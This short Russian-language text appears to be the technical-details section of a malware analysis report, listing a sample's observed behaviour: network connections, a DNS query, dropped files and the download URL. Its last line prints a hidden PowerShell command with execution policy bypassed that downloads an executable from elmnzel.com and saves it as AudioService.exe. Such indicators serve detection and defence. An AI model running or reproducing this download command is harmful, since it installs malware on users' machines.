Техническая информация
- http://elmnzel.com/cache/output.exe как c:\users\public\audioservice.exe
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1916
- %TEMP%\930608.cvr
- 'el##zel.com':80
- 'el##zel.com':443
- http://el##zel.com/cache/output.exe
- 'el##zel.com':443
- DNS ASK el##zel.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -ExecutionPolicy bypass -nologo -noprofile -c IEX ((New-Object System.Net.WebClient)).DownloadFile('http://elmnzel.com/cache/output.exe','C:\Users\Public\AudioService.exe');...' (со скрытым окном)